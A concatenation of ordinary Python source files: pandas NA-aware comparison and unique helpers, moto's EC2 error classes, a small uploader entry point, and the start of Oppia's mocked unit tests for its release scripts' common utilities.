elif not (com.is_float(x) or com.is_integer(x) or com.is_complex(x)):
try:
x = float(x)
except Exception:
try:
x = complex(x)
except Exception:
raise TypeError('Could not convert %s to numeric' % str(x))
return x
# NA-friendly array comparisons
import operator
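# The generated comparison functions mask positions where either operand is
# null back to NaN, upcasting boolean results to object dtype so that NaN
# can be stored.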
def make_nancomp(op):
def f(x, y):
xmask = isnull(x)
ymask = isnull(y)
mask = xmask | ymask
result = op(x, y)
if mask.any():
if result.dtype == np.bool_:
result = result.astype('O')
np.putmask(result, mask, np.nan)
return result
return f
nangt = make_nancomp(operator.gt)
nange = make_nancomp(operator.ge)
nanlt = make_nancomp(operator.lt)
nanle = make_nancomp(operator.le)
naneq = make_nancomp(operator.eq)
nanne = make_nancomp(operator.ne)
def unique1d(values):
"""
Hash table-based unique
"""
if np.issubdtype(values.dtype, np.floating):
table = _hash.Float64HashTable(len(values))
uniques = np.array(table.unique(com._ensure_float64(values)),
dtype=np.float64)
elif np.issubdtype(values.dtype, np.datetime64):
table = _hash.Int64HashTable(len(values))
uniques = table.unique(com._ensure_int64(values))
uniques = uniques.view('M8[ns]')
elif np.issubdtype(values.dtype, np.integer):
table = _hash.Int64HashTable(len(values))
uniques = table.unique(com._ensure_int64(values))
else:
table = _hash.PyObjectHashTable(len(values))
uniques = table.unique(com._ensure_object(values))
return uniques
|
py | b40334cea43e56a46ebf927c4abb140ee1aea66f | import os
import glob
__all__ = [os.path.basename(f)[:-3]
for f in glob.glob(os.path.dirname(__file__) + "/*.py")
if not os.path.basename(f).startswith('_')]
|
py | b40334fa99589e108ffce014aa7f6e2004e7b6a4 | from uploader.upload import main
if __name__ == '__main__':
main()
|
py | b40335b2d05b7cfbe0a3f00966c537ea7d8f28aa | from __future__ import unicode_literals
from moto.core.exceptions import RESTError
class EC2ClientError(RESTError):
code = 400
# EC2 uses <RequestID> as tag name in the XML response
request_id_tag_name = "RequestID"
class DependencyViolationError(EC2ClientError):
def __init__(self, message):
super(DependencyViolationError, self).__init__("DependencyViolation", message)
class MissingParameterError(EC2ClientError):
def __init__(self, parameter):
super(MissingParameterError, self).__init__(
"MissingParameter",
"The request must contain the parameter {0}".format(parameter),
)
class InvalidDHCPOptionsIdError(EC2ClientError):
def __init__(self, dhcp_options_id):
super(InvalidDHCPOptionsIdError, self).__init__(
"InvalidDhcpOptionID.NotFound",
"DhcpOptionID {0} does not exist.".format(dhcp_options_id),
)
class MalformedDHCPOptionsIdError(EC2ClientError):
def __init__(self, dhcp_options_id):
super(MalformedDHCPOptionsIdError, self).__init__(
"InvalidDhcpOptionsId.Malformed",
'Invalid id: "{0}" (expecting "dopt-...")'.format(dhcp_options_id),
)
class InvalidKeyPairNameError(EC2ClientError):
def __init__(self, key):
super(InvalidKeyPairNameError, self).__init__(
"InvalidKeyPair.NotFound", "The keypair '{0}' does not exist.".format(key)
)
class InvalidKeyPairDuplicateError(EC2ClientError):
def __init__(self, key):
super(InvalidKeyPairDuplicateError, self).__init__(
"InvalidKeyPair.Duplicate", "The keypair '{0}' already exists.".format(key)
)
class InvalidKeyPairFormatError(EC2ClientError):
def __init__(self):
super(InvalidKeyPairFormatError, self).__init__(
"InvalidKeyPair.Format", "Key is not in valid OpenSSH public key format"
)
class InvalidVPCIdError(EC2ClientError):
def __init__(self, vpc_id):
super(InvalidVPCIdError, self).__init__(
"InvalidVpcID.NotFound", "VpcID {0} does not exist.".format(vpc_id)
)
class InvalidSubnetIdError(EC2ClientError):
def __init__(self, subnet_id):
super(InvalidSubnetIdError, self).__init__(
"InvalidSubnetID.NotFound",
"The subnet ID '{}' does not exist".format(subnet_id),
)
class InvalidFlowLogIdError(EC2ClientError):
def __init__(self, count, flow_log_ids):
super(InvalidFlowLogIdError, self).__init__(
"InvalidFlowLogId.NotFound",
"These flow log ids in the input list are not found: [TotalCount: {0}] {1}".format(
count, flow_log_ids
),
)
class FlowLogAlreadyExists(EC2ClientError):
def __init__(self):
super(FlowLogAlreadyExists, self).__init__(
"FlowLogAlreadyExists",
"Error. There is an existing Flow Log with the same configuration and log destination.",
)
class InvalidNetworkAclIdError(EC2ClientError):
def __init__(self, network_acl_id):
super(InvalidNetworkAclIdError, self).__init__(
"InvalidNetworkAclID.NotFound",
"The network acl ID '{0}' does not exist".format(network_acl_id),
)
class InvalidVpnGatewayIdError(EC2ClientError):
def __init__(self, network_acl_id):
super(InvalidVpnGatewayIdError, self).__init__(
"InvalidVpnGatewayID.NotFound",
"The virtual private gateway ID '{0}' does not exist".format(
network_acl_id
),
)
class InvalidVpnConnectionIdError(EC2ClientError):
def __init__(self, network_acl_id):
super(InvalidVpnConnectionIdError, self).__init__(
"InvalidVpnConnectionID.NotFound",
"The vpnConnection ID '{0}' does not exist".format(network_acl_id),
)
class InvalidCustomerGatewayIdError(EC2ClientError):
def __init__(self, customer_gateway_id):
super(InvalidCustomerGatewayIdError, self).__init__(
"InvalidCustomerGatewayID.NotFound",
"The customer gateway ID '{0}' does not exist".format(customer_gateway_id),
)
class InvalidNetworkInterfaceIdError(EC2ClientError):
def __init__(self, eni_id):
super(InvalidNetworkInterfaceIdError, self).__init__(
"InvalidNetworkInterfaceID.NotFound",
"The network interface ID '{0}' does not exist".format(eni_id),
)
class InvalidNetworkAttachmentIdError(EC2ClientError):
def __init__(self, attachment_id):
super(InvalidNetworkAttachmentIdError, self).__init__(
"InvalidAttachmentID.NotFound",
"The network interface attachment ID '{0}' does not exist".format(
attachment_id
),
)
class InvalidSecurityGroupDuplicateError(EC2ClientError):
def __init__(self, name):
super(InvalidSecurityGroupDuplicateError, self).__init__(
"InvalidGroup.Duplicate",
"The security group '{0}' already exists".format(name),
)
class InvalidSecurityGroupNotFoundError(EC2ClientError):
def __init__(self, name):
super(InvalidSecurityGroupNotFoundError, self).__init__(
"InvalidGroup.NotFound",
"The security group '{0}' does not exist".format(name),
)
class InvalidPermissionNotFoundError(EC2ClientError):
def __init__(self):
super(InvalidPermissionNotFoundError, self).__init__(
"InvalidPermission.NotFound",
"The specified rule does not exist in this security group",
)
class InvalidPermissionDuplicateError(EC2ClientError):
def __init__(self):
super(InvalidPermissionDuplicateError, self).__init__(
"InvalidPermission.Duplicate", "The specified rule already exists"
)
class InvalidRouteTableIdError(EC2ClientError):
def __init__(self, route_table_id):
super(InvalidRouteTableIdError, self).__init__(
"InvalidRouteTableID.NotFound",
"The routeTable ID '{0}' does not exist".format(route_table_id),
)
class InvalidRouteError(EC2ClientError):
def __init__(self, route_table_id, cidr):
super(InvalidRouteError, self).__init__(
"InvalidRoute.NotFound",
"no route with destination-cidr-block {0} in route table {1}".format(
cidr, route_table_id
),
)
class InvalidInstanceIdError(EC2ClientError):
def __init__(self, instance_id):
super(InvalidInstanceIdError, self).__init__(
"InvalidInstanceID.NotFound",
"The instance ID '{0}' does not exist".format(instance_id),
)
class InvalidInstanceTypeError(EC2ClientError):
def __init__(self, instance_type):
super(InvalidInstanceTypeError, self).__init__(
"InvalidInstanceType.NotFound",
"The instance type '{0}' does not exist".format(instance_type),
)
class InvalidAMIIdError(EC2ClientError):
def __init__(self, ami_id):
super(InvalidAMIIdError, self).__init__(
"InvalidAMIID.NotFound",
"The image id '[{0}]' does not exist".format(ami_id),
)
class InvalidAMIAttributeItemValueError(EC2ClientError):
def __init__(self, attribute, value):
super(InvalidAMIAttributeItemValueError, self).__init__(
"InvalidAMIAttributeItemValue",
'Invalid attribute item value "{0}" for {1} item type.'.format(
value, attribute
),
)
class MalformedAMIIdError(EC2ClientError):
def __init__(self, ami_id):
super(MalformedAMIIdError, self).__init__(
"InvalidAMIID.Malformed",
'Invalid id: "{0}" (expecting "ami-...")'.format(ami_id),
)
class InvalidSnapshotIdError(EC2ClientError):
def __init__(self, snapshot_id):
super(InvalidSnapshotIdError, self).__init__(
"InvalidSnapshot.NotFound", ""
) # Note: AWS returns empty message for this, as of 2014.08.22.
class InvalidVolumeIdError(EC2ClientError):
def __init__(self, volume_id):
super(InvalidVolumeIdError, self).__init__(
"InvalidVolume.NotFound",
"The volume '{0}' does not exist.".format(volume_id),
)
class InvalidVolumeAttachmentError(EC2ClientError):
def __init__(self, volume_id, instance_id):
super(InvalidVolumeAttachmentError, self).__init__(
"InvalidAttachment.NotFound",
"Volume {0} can not be detached from {1} because it is not attached".format(
volume_id, instance_id
),
)
class InvalidVolumeDetachmentError(EC2ClientError):
def __init__(self, volume_id, instance_id, device):
super(InvalidVolumeDetachmentError, self).__init__(
"InvalidAttachment.NotFound",
"The volume {0} is not attached to instance {1} as device {2}".format(
volume_id, instance_id, device
),
)
class VolumeInUseError(EC2ClientError):
def __init__(self, volume_id, instance_id):
super(VolumeInUseError, self).__init__(
"VolumeInUse",
"Volume {0} is currently attached to {1}".format(volume_id, instance_id),
)
class InvalidDomainError(EC2ClientError):
def __init__(self, domain):
super(InvalidDomainError, self).__init__(
"InvalidParameterValue", "Invalid value '{0}' for domain.".format(domain)
)
class InvalidAddressError(EC2ClientError):
def __init__(self, ip):
super(InvalidAddressError, self).__init__(
"InvalidAddress.NotFound", "Address '{0}' not found.".format(ip)
)
class LogDestinationNotFoundError(EC2ClientError):
def __init__(self, bucket_name):
super(LogDestinationNotFoundError, self).__init__(
"LogDestinationNotFoundException",
"LogDestination: '{0}' does not exist.".format(bucket_name),
)
class InvalidAllocationIdError(EC2ClientError):
def __init__(self, allocation_id):
super(InvalidAllocationIdError, self).__init__(
"InvalidAllocationID.NotFound",
"Allocation ID '{0}' not found.".format(allocation_id),
)
class InvalidAssociationIdError(EC2ClientError):
def __init__(self, association_id):
super(InvalidAssociationIdError, self).__init__(
"InvalidAssociationID.NotFound",
"Association ID '{0}' not found.".format(association_id),
)
class InvalidVpcCidrBlockAssociationIdError(EC2ClientError):
def __init__(self, association_id):
super(InvalidVpcCidrBlockAssociationIdError, self).__init__(
"InvalidVpcCidrBlockAssociationIdError.NotFound",
"The vpc CIDR block association ID '{0}' does not exist".format(
association_id
),
)
class InvalidVPCPeeringConnectionIdError(EC2ClientError):
def __init__(self, vpc_peering_connection_id):
super(InvalidVPCPeeringConnectionIdError, self).__init__(
"InvalidVpcPeeringConnectionId.NotFound",
"VpcPeeringConnectionID {0} does not exist.".format(
vpc_peering_connection_id
),
)
class InvalidVPCPeeringConnectionStateTransitionError(EC2ClientError):
def __init__(self, vpc_peering_connection_id):
super(InvalidVPCPeeringConnectionStateTransitionError, self).__init__(
"InvalidStateTransition",
"VpcPeeringConnectionID {0} is not in the correct state for the request.".format(
vpc_peering_connection_id
),
)
class InvalidDependantParameterError(EC2ClientError):
def __init__(self, dependant_parameter, parameter, parameter_value):
super(InvalidDependantParameterError, self).__init__(
"InvalidParameter",
"{0} can't be empty if {1} is {2}.".format(
dependant_parameter, parameter, parameter_value,
),
)
class InvalidDependantParameterTypeError(EC2ClientError):
def __init__(self, dependant_parameter, parameter_value, parameter):
super(InvalidDependantParameterTypeError, self).__init__(
"InvalidParameter",
"{0} type must be {1} if {2} is provided.".format(
dependant_parameter, parameter_value, parameter,
),
)
class InvalidAggregationIntervalParameterError(EC2ClientError):
def __init__(self, parameter):
super(InvalidAggregationIntervalParameterError, self).__init__(
"InvalidParameter", "Invalid {0}".format(parameter),
)
class InvalidParameterValueError(EC2ClientError):
def __init__(self, parameter_value):
super(InvalidParameterValueError, self).__init__(
"InvalidParameterValue",
"Value {0} is invalid for parameter.".format(parameter_value),
)
class InvalidParameterValueErrorTagNull(EC2ClientError):
def __init__(self):
super(InvalidParameterValueErrorTagNull, self).__init__(
"InvalidParameterValue",
"Tag value cannot be null. Use empty string instead.",
)
class InvalidParameterValueErrorUnknownAttribute(EC2ClientError):
def __init__(self, parameter_value):
super(InvalidParameterValueErrorUnknownAttribute, self).__init__(
"InvalidParameterValue",
"Value ({0}) for parameter attribute is invalid. Unknown attribute.".format(
parameter_value
),
)
class InvalidGatewayIDError(EC2ClientError):
def __init__(self, gateway_id):
super(InvalidGatewayIDError, self).__init__(
"InvalidGatewayID.NotFound",
"The eigw ID '{0}' does not exist".format(gateway_id),
)
class InvalidInternetGatewayIdError(EC2ClientError):
def __init__(self, internet_gateway_id):
super(InvalidInternetGatewayIdError, self).__init__(
"InvalidInternetGatewayID.NotFound",
"InternetGatewayID {0} does not exist.".format(internet_gateway_id),
)
class GatewayNotAttachedError(EC2ClientError):
def __init__(self, internet_gateway_id, vpc_id):
super(GatewayNotAttachedError, self).__init__(
"Gateway.NotAttached",
"InternetGatewayID {0} is not attached to a VPC {1}.".format(
internet_gateway_id, vpc_id
),
)
class ResourceAlreadyAssociatedError(EC2ClientError):
def __init__(self, resource_id):
super(ResourceAlreadyAssociatedError, self).__init__(
"Resource.AlreadyAssociated",
"Resource {0} is already associated.".format(resource_id),
)
class TagLimitExceeded(EC2ClientError):
def __init__(self):
super(TagLimitExceeded, self).__init__(
"TagLimitExceeded",
"The maximum number of Tags for a resource has been reached.",
)
class InvalidID(EC2ClientError):
def __init__(self, resource_id):
super(InvalidID, self).__init__(
"InvalidID", "The ID '{0}' is not valid".format(resource_id)
)
class InvalidCIDRSubnetError(EC2ClientError):
def __init__(self, cidr):
super(InvalidCIDRSubnetError, self).__init__(
"InvalidParameterValue",
"invalid CIDR subnet specification: {0}".format(cidr),
)
class RulesPerSecurityGroupLimitExceededError(EC2ClientError):
def __init__(self):
super(RulesPerSecurityGroupLimitExceededError, self).__init__(
"RulesPerSecurityGroupLimitExceeded",
"The maximum number of rules per security group " "has been reached.",
)
class MotoNotImplementedError(NotImplementedError):
def __init__(self, blurb):
super(MotoNotImplementedError, self).__init__(
"{0} has not been implemented in Moto yet."
" Feel free to open an issue at"
" https://github.com/spulec/moto/issues".format(blurb)
)
class FilterNotImplementedError(MotoNotImplementedError):
def __init__(self, filter_name, method_name):
super(FilterNotImplementedError, self).__init__(
"The filter '{0}' for {1}".format(filter_name, method_name)
)
class CidrLimitExceeded(EC2ClientError):
def __init__(self, vpc_id, max_cidr_limit):
super(CidrLimitExceeded, self).__init__(
"CidrLimitExceeded",
"This network '{0}' has met its maximum number of allowed CIDRs: {1}".format(
vpc_id, max_cidr_limit
),
)
class UnsupportedTenancy(EC2ClientError):
def __init__(self, tenancy):
super(UnsupportedTenancy, self).__init__(
"UnsupportedTenancy",
"The tenancy value {0} is not supported.".format(tenancy),
)
class OperationNotPermitted(EC2ClientError):
def __init__(self, association_id):
super(OperationNotPermitted, self).__init__(
"OperationNotPermitted",
"The vpc CIDR block with association ID {} may not be disassociated. "
"It is the primary IPv4 CIDR block of the VPC".format(association_id),
)
class InvalidAvailabilityZoneError(EC2ClientError):
def __init__(self, availability_zone_value, valid_availability_zones):
super(InvalidAvailabilityZoneError, self).__init__(
"InvalidParameterValue",
"Value ({0}) for parameter availabilityZone is invalid. "
"Subnets can currently only be created in the following availability zones: {1}.".format(
availability_zone_value, valid_availability_zones
),
)
class NetworkAclEntryAlreadyExistsError(EC2ClientError):
def __init__(self, rule_number):
super(NetworkAclEntryAlreadyExistsError, self).__init__(
"NetworkAclEntryAlreadyExists",
"The network acl entry identified by {} already exists.".format(
rule_number
),
)
class InvalidSubnetRangeError(EC2ClientError):
def __init__(self, cidr_block):
super(InvalidSubnetRangeError, self).__init__(
"InvalidSubnet.Range", "The CIDR '{}' is invalid.".format(cidr_block)
)
class InvalidCIDRBlockParameterError(EC2ClientError):
def __init__(self, cidr_block):
super(InvalidCIDRBlockParameterError, self).__init__(
"InvalidParameterValue",
"Value ({}) for parameter cidrBlock is invalid. This is not a valid CIDR block.".format(
cidr_block
),
)
class InvalidDestinationCIDRBlockParameterError(EC2ClientError):
def __init__(self, cidr_block):
super(InvalidDestinationCIDRBlockParameterError, self).__init__(
"InvalidParameterValue",
"Value ({}) for parameter destinationCidrBlock is invalid. This is not a valid CIDR block.".format(
cidr_block
),
)
class InvalidSubnetConflictError(EC2ClientError):
def __init__(self, cidr_block):
super(InvalidSubnetConflictError, self).__init__(
"InvalidSubnet.Conflict",
"The CIDR '{}' conflicts with another subnet".format(cidr_block),
)
class InvalidVPCRangeError(EC2ClientError):
def __init__(self, cidr_block):
super(InvalidVPCRangeError, self).__init__(
"InvalidVpc.Range", "The CIDR '{}' is invalid.".format(cidr_block)
)
# accept exception
class OperationNotPermitted2(EC2ClientError):
def __init__(self, client_region, pcx_id, acceptor_region):
super(OperationNotPermitted2, self).__init__(
"OperationNotPermitted",
"Incorrect region ({0}) specified for this request."
"VPC peering connection {1} must be accepted in region {2}".format(
client_region, pcx_id, acceptor_region
),
)
# reject exception
class OperationNotPermitted3(EC2ClientError):
def __init__(self, client_region, pcx_id, acceptor_region):
super(OperationNotPermitted3, self).__init__(
"OperationNotPermitted",
"Incorrect region ({0}) specified for this request."
"VPC peering connection {1} must be accepted or rejected in region {2}".format(
client_region, pcx_id, acceptor_region
),
)
class OperationNotPermitted4(EC2ClientError):
def __init__(self, instance_id):
super(OperationNotPermitted4, self).__init__(
"OperationNotPermitted",
"The instance '{0}' may not be terminated. Modify its 'disableApiTermination' "
"instance attribute and try again.".format(instance_id),
)
class InvalidLaunchTemplateNameError(EC2ClientError):
def __init__(self):
super(InvalidLaunchTemplateNameError, self).__init__(
"InvalidLaunchTemplateName.AlreadyExistsException",
"Launch template name already in use.",
)
class InvalidParameterDependency(EC2ClientError):
def __init__(self, param, param_needed):
super(InvalidParameterDependency, self).__init__(
"InvalidParameterDependency",
"The parameter [{0}] requires the parameter {1} to be set.".format(
param, param_needed
),
)
class IncorrectStateIamProfileAssociationError(EC2ClientError):
def __init__(self, instance_id):
super(IncorrectStateIamProfileAssociationError, self).__init__(
"IncorrectState",
"There is an existing association for instance {0}".format(instance_id),
)
class InvalidAssociationIDIamProfileAssociationError(EC2ClientError):
def __init__(self, association_id):
super(InvalidAssociationIDIamProfileAssociationError, self).__init__(
"InvalidAssociationID.NotFound",
"An invalid association-id of '{0}' was given".format(association_id),
)
class InvalidVpcEndPointIdError(EC2ClientError):
def __init__(self, vpc_end_point_id):
super(InvalidVpcEndPointIdError, self).__init__(
"InvalidVpcEndpointId.NotFound",
"The VpcEndPoint ID '{0}' does not exist".format(vpc_end_point_id),
)
class InvalidTaggableResourceType(EC2ClientError):
def __init__(self, resource_type):
super(InvalidTaggableResourceType, self).__init__(
"InvalidParameterValue",
"'{}' is not a valid taggable resource type for this operation.".format(
resource_type
),
)
|
py | b40335c391df32b89d3c78d29ea231981d4dbe60 | #
# Copyright 2019 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for scripts/common.py."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import contextlib
import getpass
import http.server
import os
import re
import shutil
import socketserver
import stat
import subprocess
import sys
import tempfile
from core.tests import test_utils
import psutil
import python_utils
import release_constants
from . import common
_PARENT_DIR = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
_PY_GITHUB_PATH = os.path.join(
_PARENT_DIR, 'oppia_tools', 'PyGithub-%s' % common.PYGITHUB_VERSION)
sys.path.insert(0, _PY_GITHUB_PATH)
# pylint: disable=wrong-import-position
import github # isort:skip
# pylint: enable=wrong-import-position
class MockPsutilProcess(python_utils.OBJECT):
"""A mock class for Process class in Psutil."""
cmdlines = [
['dev_appserver.py', '--host', '0.0.0.0', '--port', '9001'],
['downloads']
]
def __init__(self, index):
"""Constructor for this mock object.
Args:
index: int. The index of process to be checked.
"""
self.index = index
def cmdline(self):
"""Return the command line of this process."""
        return self.cmdlines[self.index]
def kill(self):
"""Kill the process."""
pass
def is_running(self):
"""Check whether the function is running."""
return True
class CommonTests(test_utils.GenericTestBase):
"""Test the methods which handle common functionalities."""
def test_is_x64_architecture_in_x86(self):
maxsize_swap = self.swap(sys, 'maxsize', 1)
with maxsize_swap:
self.assertFalse(common.is_x64_architecture())
def test_is_x64_architecture_in_x64(self):
maxsize_swap = self.swap(sys, 'maxsize', 2**32 + 1)
with maxsize_swap:
self.assertTrue(common.is_x64_architecture())
def test_run_cmd(self):
self.assertEqual(
common.run_cmd(('echo Test for common.py ').split(' ')),
'Test for common.py')
def test_ensure_directory_exists_with_existing_dir(self):
check_function_calls = {
'makedirs_gets_called': False
}
def mock_makedirs(unused_dirpath):
check_function_calls['makedirs_gets_called'] = True
with self.swap(os, 'makedirs', mock_makedirs):
common.ensure_directory_exists('assets')
self.assertEqual(check_function_calls, {'makedirs_gets_called': False})
def test_ensure_directory_exists_with_non_existing_dir(self):
check_function_calls = {
'makedirs_gets_called': False
}
def mock_makedirs(unused_dirpath):
check_function_calls['makedirs_gets_called'] = True
with self.swap(os, 'makedirs', mock_makedirs):
common.ensure_directory_exists('test-dir')
self.assertEqual(check_function_calls, {'makedirs_gets_called': True})
def test_require_cwd_to_be_oppia_with_correct_cwd_and_unallowed_deploy_dir(
self):
common.require_cwd_to_be_oppia()
def test_require_cwd_to_be_oppia_with_correct_cwd_and_allowed_deploy_dir(
self):
common.require_cwd_to_be_oppia(allow_deploy_dir=True)
def test_require_cwd_to_be_oppia_with_wrong_cwd_and_unallowed_deploy_dir(
self):
def mock_getcwd():
return 'invalid'
getcwd_swap = self.swap(os, 'getcwd', mock_getcwd)
with getcwd_swap, self.assertRaisesRegexp(
Exception, 'Please run this script from the oppia/ directory.'):
common.require_cwd_to_be_oppia()
def test_require_cwd_to_be_oppia_with_wrong_cwd_and_allowed_deploy_dir(
self):
def mock_getcwd():
return 'invalid'
def mock_basename(unused_dirpath):
return 'deploy-dir'
def mock_isdir(unused_dirpath):
return True
getcwd_swap = self.swap(os, 'getcwd', mock_getcwd)
basename_swap = self.swap(os.path, 'basename', mock_basename)
isdir_swap = self.swap(os.path, 'isdir', mock_isdir)
with getcwd_swap, basename_swap, isdir_swap:
common.require_cwd_to_be_oppia(allow_deploy_dir=True)
def test_open_new_tab_in_browser_if_possible_with_user_manually_opening_url(
self):
try:
check_function_calls = {
'input_gets_called': 0,
'check_call_gets_called': False
}
expected_check_function_calls = {
'input_gets_called': 1,
'check_call_gets_called': False
}
def mock_call(unused_cmd_tokens):
return 0
def mock_check_call(unused_cmd_tokens):
check_function_calls['check_call_gets_called'] = True
def mock_input():
check_function_calls['input_gets_called'] += 1
return 'n'
call_swap = self.swap(subprocess, 'call', mock_call)
check_call_swap = self.swap(
subprocess, 'check_call', mock_check_call)
input_swap = self.swap(python_utils, 'INPUT', mock_input)
with call_swap, check_call_swap, input_swap:
common.open_new_tab_in_browser_if_possible('test-url')
self.assertEqual(
check_function_calls, expected_check_function_calls)
finally:
common.USER_PREFERENCES['open_new_tab_in_browser'] = None
def test_open_new_tab_in_browser_if_possible_with_url_opening_correctly(
self):
try:
check_function_calls = {
'input_gets_called': 0,
'check_call_gets_called': False
}
expected_check_function_calls = {
'input_gets_called': 1,
'check_call_gets_called': True
}
def mock_call(unused_cmd_tokens):
return 0
def mock_check_call(unused_cmd_tokens):
check_function_calls['check_call_gets_called'] = True
def mock_input():
check_function_calls['input_gets_called'] += 1
return 'y'
call_swap = self.swap(subprocess, 'call', mock_call)
check_call_swap = self.swap(
subprocess, 'check_call', mock_check_call)
input_swap = self.swap(python_utils, 'INPUT', mock_input)
with call_swap, check_call_swap, input_swap:
common.open_new_tab_in_browser_if_possible('test-url')
self.assertEqual(
check_function_calls, expected_check_function_calls)
finally:
common.USER_PREFERENCES['open_new_tab_in_browser'] = None
def test_open_new_tab_in_browser_if_possible_with_url_not_opening_correctly(
self):
try:
check_function_calls = {
'input_gets_called': 0,
'check_call_gets_called': False
}
expected_check_function_calls = {
'input_gets_called': 2,
'check_call_gets_called': False
}
def mock_call(unused_cmd_tokens):
return 1
def mock_check_call(unused_cmd_tokens):
check_function_calls['check_call_gets_called'] = True
def mock_input():
check_function_calls['input_gets_called'] += 1
return 'y'
call_swap = self.swap(subprocess, 'call', mock_call)
check_call_swap = self.swap(
subprocess, 'check_call', mock_check_call)
input_swap = self.swap(python_utils, 'INPUT', mock_input)
with call_swap, check_call_swap, input_swap:
common.open_new_tab_in_browser_if_possible('test-url')
self.assertEqual(
check_function_calls, expected_check_function_calls)
finally:
common.USER_PREFERENCES['open_new_tab_in_browser'] = None
def test_get_remote_alias_with_correct_alias(self):
def mock_check_output(unused_cmd_tokens):
return 'remote1 url1\nremote2 url2'
with self.swap(
subprocess, 'check_output', mock_check_output):
self.assertEqual(common.get_remote_alias('url1'), 'remote1')
def test_get_remote_alias_with_incorrect_alias(self):
def mock_check_output(unused_cmd_tokens):
return 'remote1 url1\nremote2 url2'
check_output_swap = self.swap(
subprocess, 'check_output', mock_check_output)
with check_output_swap, self.assertRaisesRegexp(
Exception,
'ERROR: There is no existing remote alias for the url3 repo.'):
common.get_remote_alias('url3')
def test_verify_local_repo_is_clean_with_clean_repo(self):
def mock_check_output(unused_cmd_tokens):
return 'nothing to commit, working directory clean'
with self.swap(
subprocess, 'check_output', mock_check_output):
common.verify_local_repo_is_clean()
def test_verify_local_repo_is_clean_with_unclean_repo(self):
def mock_check_output(unused_cmd_tokens):
return 'invalid'
check_output_swap = self.swap(
subprocess, 'check_output', mock_check_output)
with check_output_swap, self.assertRaisesRegexp(
Exception, 'ERROR: This script should be run from a clean branch.'):
common.verify_local_repo_is_clean()
def test_get_current_branch_name(self):
def mock_check_output(unused_cmd_tokens):
return 'On branch test'
with self.swap(
subprocess, 'check_output', mock_check_output):
self.assertEqual(common.get_current_branch_name(), 'test')
def test_get_current_release_version_number_with_non_hotfix_branch(self):
self.assertEqual(
common.get_current_release_version_number('release-1.2.3'), '1.2.3')
def test_get_current_release_version_number_with_hotfix_branch(self):
self.assertEqual(
common.get_current_release_version_number('release-1.2.3-hotfix-1'),
'1.2.3')
def test_get_current_release_version_number_with_maintenance_branch(self):
self.assertEqual(
common.get_current_release_version_number(
'release-maintenance-1.2.3'), '1.2.3')
def test_get_current_release_version_number_with_invalid_branch(self):
with self.assertRaisesRegexp(
Exception, 'Invalid branch name: invalid-branch.'):
common.get_current_release_version_number('invalid-branch')
def test_is_current_branch_a_hotfix_branch_with_non_hotfix_branch(self):
def mock_check_output(unused_cmd_tokens):
return 'On branch release-1.2.3'
with self.swap(
subprocess, 'check_output', mock_check_output):
self.assertEqual(common.is_current_branch_a_hotfix_branch(), False)
def test_is_current_branch_a_hotfix_branch_with_hotfix_branch(self):
def mock_check_output(unused_cmd_tokens):
return 'On branch release-1.2.3-hotfix-1'
with self.swap(
subprocess, 'check_output', mock_check_output):
self.assertEqual(common.is_current_branch_a_hotfix_branch(), True)
def test_is_current_branch_a_release_branch_with_release_branch(self):
def mock_check_output(unused_cmd_tokens):
return 'On branch release-1.2.3'
with self.swap(
subprocess, 'check_output', mock_check_output):
self.assertEqual(common.is_current_branch_a_release_branch(), True)
def test_is_current_branch_a_release_branch_with_hotfix_branch(self):
def mock_check_output(unused_cmd_tokens):
return 'On branch release-1.2.3-hotfix-1'
with self.swap(
subprocess, 'check_output', mock_check_output):
self.assertEqual(common.is_current_branch_a_release_branch(), True)
def test_is_current_branch_a_release_branch_with_maintenance_branch(self):
def mock_check_output(unused_cmd_tokens):
return 'On branch release-maintenance-1.2.3'
with self.swap(
subprocess, 'check_output', mock_check_output):
self.assertEqual(common.is_current_branch_a_release_branch(), True)
def test_is_current_branch_a_release_branch_with_non_release_branch(self):
def mock_check_output(unused_cmd_tokens):
return 'On branch test'
with self.swap(
subprocess, 'check_output', mock_check_output):
self.assertEqual(common.is_current_branch_a_release_branch(), False)
def test_is_current_branch_a_test_branch_with_test_branch(self):
def mock_check_output(unused_cmd_tokens):
return 'On branch test-common'
with self.swap(
subprocess, 'check_output', mock_check_output):
self.assertEqual(common.is_current_branch_a_test_branch(), True)
def test_is_current_branch_a_test_branch_with_non_test_branch(self):
def mock_check_output(unused_cmd_tokens):
return 'On branch invalid-test'
with self.swap(
subprocess, 'check_output', mock_check_output):
self.assertEqual(common.is_current_branch_a_test_branch(), False)
def test_verify_current_branch_name_with_correct_branch(self):
def mock_check_output(unused_cmd_tokens):
return 'On branch test'
with self.swap(
subprocess, 'check_output', mock_check_output):
common.verify_current_branch_name('test')
def test_verify_current_branch_name_with_incorrect_branch(self):
def mock_check_output(unused_cmd_tokens):
return 'On branch invalid'
check_output_swap = self.swap(
subprocess, 'check_output', mock_check_output)
with check_output_swap, self.assertRaisesRegexp(
Exception,
'ERROR: This script can only be run from the "test" branch.'):
common.verify_current_branch_name('test')
def test_ensure_release_scripts_folder_exists_with_invalid_access(self):
process = subprocess.Popen(['test'], stdout=subprocess.PIPE)
def mock_isdir(unused_dirpath):
return False
def mock_chdir(unused_dirpath):
pass
# pylint: disable=unused-argument
def mock_popen(unused_cmd, stdin, stdout, stderr):
return process
# pylint: enable=unused-argument
def mock_communicate(unused_self):
return ('Output', 'Invalid')
isdir_swap = self.swap(os.path, 'isdir', mock_isdir)
chdir_swap = self.swap(os, 'chdir', mock_chdir)
popen_swap = self.swap(subprocess, 'Popen', mock_popen)
communicate_swap = self.swap(
subprocess.Popen, 'communicate', mock_communicate)
with isdir_swap, chdir_swap, popen_swap, communicate_swap:
with self.assertRaisesRegexp(
Exception, (
'You need SSH access to GitHub. See the '
'"Check your SSH access" section here and follow the '
'instructions: '
'https://help.github.com/articles/'
'error-repository-not-found/#check-your-ssh-access')):
common.ensure_release_scripts_folder_exists_and_is_up_to_date()
def test_ensure_release_scripts_folder_exists_with_valid_access(self):
